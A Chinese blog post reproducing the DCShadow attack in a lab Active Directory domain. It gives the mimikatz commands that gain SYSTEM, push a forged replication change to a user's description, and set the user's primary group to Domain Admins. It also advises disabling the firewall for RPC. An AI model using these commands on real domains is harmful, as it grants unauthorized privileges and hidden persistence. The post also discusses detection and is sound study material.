DCShadow攻击复现

最新推荐文章于 2023-05-16 13:25:08 发布
最新推荐文章于 2023-05-16 13:25:08 发布
阅读量732 收藏 1
点赞数
分类专栏: 工具 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39030256/article/details/109744907
版权

1.DCShadow

实测才是硬道理!

2.测试环境

DC:Windows server 2012
域:tony.local
 
域主机:Windows server 2016
已加域
 

2.1.涉及到的账户

2.1.1.域管理组账户

账户名:test


 

2.1.2.域普通账户

账户名:dc
 

3.实验流程-1

3.1.创建窗口A

登录域主机Windows server 2016本地账


 

3.1.1.右键管理员打开权限mimikatz


3.1.2.启用system权限

依次执行命令,确保当前的进程已system权限打开

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 584/cmd.exe
 * to 3968/mimikatz.exe

mimikatz # token::whoami
 * Process Token : {0;000003e7} 1 D 1421627     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,31p)       Primary
 * Thread Token  : no token

3.1.3.窗口A

这个窗口暂时命名为:窗口A


 

3.2.开始执行DCShadow

3.2.1.查看描述

这里更改dc账户的描述,先查看dc的描述,由于我更改过,所以此时显示为
    “hi,hello”
 

3.2.2.执行更改


在刚才启动的窗口A中执行修改命令,来替换“hi,hello”

mimikatz # lsadump::dcshadow /object:CN=dc,CN=Users,DC=tony,DC=local /attribute:description /value:"an attcker"

执行完后如下所示,等待通过RPC协议推送至域控


 

3.3.创建窗口B

  保持这个窗口,不要关闭!并在管理员权限下打开另一个cmd窗口,这个窗口的权限必须是域管理组成员的权限,也就是Domain admin组成员。

3.3.1.使用PSEXEC

这里使用psexec来启用窗口


 

3.3.2.运行mimikatz

在这个窗口下运行mimikatz,查看当前的权限,为域管理权限test


 

3.3.3.执行推送命令


执行推送命令,下图可以看到,执行完推送命令后,刚开始执行修改的窗口显示RPC server stopped,此时就已经修改完成

mimikatz # lsadump::dcshadow /push

 

3.4.查看修改结果

修改成功


 

4.实验流程-2

将dc账户添加至管理员组(Domain admin)

4.1.查看描述


首先查看dc的信息

PSC:\Users\Administrator> ([adsisearcher]"(&(objectCategory=user)(name=dc))").Findall().Properties

此时dc的组ID为513


 
可以参考下面的对应组ID,513为域用户,那想要将dc加入至域管理组,就需要将组ID更改为512

  •     512   Domain Admins
  •     513   Domain Users
  •     514   Domain Guests
  •     515   Domain Computers
  •     516   Domain Controllers

4.2.执行更改


在窗口A中执行

mimikatz # lsadump::dcshadow /object:CN=dc,CN=Users,DC=tony,DC=local /attribute:primarygroupid /value:512

 

 

4.3.执行推送命令


推送至域控制器


 

4.4.查看修改结果

查看dc的所属组


 
 

5.可能会出现的实验失败情况


在实验过程中,出现推送服务失败的情况,短暂性的卡在如下图的界面,随后出现Performing Unregistration(取消注册)

这里呢,域控之间的通信是通过RPC服务来进行的,执行推送的过程也是需要RPC服务,域控本身RPC服务端口是开放的

但是测试主机的RPC服务端口未开放。所以,有两种解决方法:

1、把域主机的防火墙关闭

2、在域主机防火墙中添加策略,开放RPC服务的端口(具体就不再写了,可以自行百度)


 
 

6.总结

DCShadow目前还是具有危害性的操作行为,该技术可以用于更改和删除复制以及其他关联的元数据,以阻止应急人员分析。

攻击者还可以利用此技术执行SID历史记录注入和操纵AD对象(例如帐户,访问控制列表等)以建立持久性后门。

这不属于漏洞,因为是使用合法的已记录使用的协议:

  •     MS-ADTS
  •     MS-DRSR

这是一种利用后攻击(也称为控制攻击),因为它需要域管理员(或企业管理员)特权。

安全分析人员可以通过流量以及相关的安全日志来查找痕迹。(目前我还没有发现执行过后官网所说的事件ID)。

当然,也可以通过命令行参数(sysmon和cmd)来监控这种攻击的发生,但是并不现实。

注:本文为原创博客,如转载请标记出处!谢谢!

 

 

 

ID不重要
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
基于AD Event日志识别DCShadow攻击
10-08 479
01、简介DCShadow攻击,是攻击者在获取到域管理员权限后,通过将沦陷的主机伪造成域控,将预先设定的对象或对象属性复制到正在运行的域控服务器中。DCSync&DCShadow区别在于,DCSync是从域服务器将数据复制出来,而DCShadow是将伪造的数据复制到域服务器。02、攻击过程示例假设我们已经拿到了某台服务器SYSTEM权限,并从沦陷的服务器中获取到了域管理员的账号密码。第一步...
【网络安全】浅谈数据库攻击复现及相关安全优化
m0_71744044的博客
01-09 294
由于安全意识缺乏,被不法之人黑进了数据库
域渗透之DCShadow攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-11 892
2018年1月24日,Benjamin Delpy(神器 Mimikatz 的作者)和 Vincent Le Toux 在 BlueHat IL 会议期间公布了针对域活动目录的一种新型攻击技术 DCShadow。在具备域管理员权限条件下,攻击者可以创建伪造的域控制器,将预先设定的对象或对象属性复制到正在运行域服务器中。DCSync 从域服务器复制出东西,DCShadow 是将数据复制至域服务器。
pancakeBunny攻击复现
BradMoon的博客
02-25 4063
文章目录pancakeBunny攻击解析pancakeBunny攻击文字解析整个攻击流程图 pancakeBunny攻击解析 二图流: 图1:此图在写文章时做了一下,但是没啥用,能看懂英文的就看 图2:详细的资金流泳道图,超大杯 pancakeBunny攻击文字解析 根据攻击的分析,攻击者膨胀了BUNNY-BNB池子中的BNB数量,膨胀方法并非用BNB直接去购买BUNNY,而是使用添加流动性的方法膨胀 而添加流动性,则是使用zapBSC中的 攻击的关键在于受害池子USDT-BNB存在V1和V2两个
DCShadow
Ping_Pig的博客
10-26 395
讲在前面 内网的众多漏洞当中,我们就不得不介绍DCShadow和DCSync。笔者在国内外优秀的研究员的研究基础上,对相对比较优秀的文章做一次总结,尽量言简意赅的将这两个漏洞的意思表达清楚。DCSync已经做过一篇文章的介绍,本篇文章简单回顾。 DCShadow攻击简介 在具备域管理员权限的前提下,攻击者可以创建伪造的域控制器,将预先设定好的对象或对象属性同步复制到正在运行的域服务器中 在目标AD中注册一个伪造的DC 使伪造的DC被其他DC认可,能够参与域复制 强制触发域复制,将预先设定好的对象
永恒之蓝复现kaliwin7
最新发布
07-19
永恒之蓝复现kaliwin7
使用numpy复现贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来复现贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
numpy复现xgboost算法内含数据集
10-16
本主题将深入探讨如何使用基础的NumPy库来复现XGBoost算法的核心概念,这对于理解其工作原理和进行性能优化非常有帮助。 XGBoost全称为“Extreme Gradient Boosting”,它是在梯度提升框架下实现的一种集成学习方法...
代码复现CSRF攻击并解决它
kobe_okok的博客
06-08 697
From 百度百科:CSRF跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。我们创建两个站点: 一个是正常的网站,没有防御CSRF攻击 另一个是黑客的网站,专门对没有CSRF的网站
MS12-020漏洞攻击复现
行动、坚持。
01-24 2533
1、漏洞说明 MS12-020:开启远程桌面服务(3389端口)的系统可被执行远程代码(蓝屏重启) 受影响系统:Windows XP、Windows 7、Server 2003/2008 (漏洞官方说明) 2、实验环境 网络:Win Server 2003 <-> Win XP 角色:Win Server 2003 模拟黑客,Win XP模拟肉鸡/靶机 3、实验流程 DOS下开启远程服务: REG ADD HKLM\SYSTEM\CurrentControlSet\Contr
跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例
sGanYu
10-24 7729
目录 xss漏洞介绍 XSS是什么 XSS漏洞原理 反射型XSS攻击复现 存储型XSS攻击复现 DOM型XSS攻击复现 常用的XSS测试语句 关于XSS的防御 xss漏洞介绍 跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS XSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响
全站最新全详细Outlook Ntlm Relayx攻击方法复现
slash_HK的博客
01-13 2053
outlook ntlm relayx攻击手段详情 超详细!
Kerberos域安全系列(27)-DCShadow测试技术分析
prettyX的博客
02-16 472
2018年1月24日,Benjamin Delpy(神器Mimikatz的作者)和Vincent Le Toux在BlueHat IL会议期间公布了针对域活动目录的一种新型攻击技术“DCShadow”。最新版的Mimikatz已经集成了这个功能。 在具备域管理员权限条件下,攻击者可以创建伪造域控制器,将预先设定的对象或对象属性复制到正在运行的域服务器中。 在具备域管理员权限,还需要这种方法吗?...
内网渗透(七十五)之域权限维持之DCShadow
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-16 569
2018年1月24日,在BlueHat安全会议上,安全研究员Benjamin Delpy 和 Vincent Le Toux 公布了针对微软活动目录域的一种新型攻击技术------DCShaow。利用该攻击技术,具有域管理员权限或企业管理员权限的恶意攻击者可以创建恶意域控,然后利用域控间正常同步数据的功能将恶意域控上的恶意对象同步到正在运行的正常域控上。由于执行该攻击操作需要域管理员权限或企业管理员权限,因此该攻击技术通常用于域权限维持。
域权限维持(DCShadow)
qq_18811919的博客
03-21 301
本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用, DCShadow是一种常见的域维持手段是通过伪造成恶意DC进行, 同步进行进而权限维持。
【域权限维持】-DCShadow
qq_41617902的博客
01-20 220
DCShadow:伪造DC,通过域控的同步功能,修改正常DC上的数据达到凭据窃取的目的
vulhub xss攻击复现
05-01
Vulhub是一个开源的靶场环境,其中包含很多常见漏洞的复现环境。在使用Vulhub进行复现时,我们可以学习并掌握如何攻击及防御这些漏洞。 XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者可以通过注入恶意脚本来窃取用户的敏感信息或者控制用户的浏览器。在Vulhub中,我们可以找到多种XSS漏洞的复现环境,如DOM-XSS、反射型XSS等。 在进行XSS漏洞复现时,需要首先了解XSS攻击的原理和方式,然后根据复现环境中给出的提示或者源代码进行相关的操作。例如,在DOM-XSS漏洞复现环境中,我们需要使用浏览器的开发者工具查看网页源代码,并找到相关的input字段,然后输入恶意脚本,提交表单即可触发XSS攻击。 需要注意的是,在进行XSS漏洞复现时,我们需要对攻击的范围和影响有一个清晰的认识,同时不要直接在真实网站上进行测试,以免不必要的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值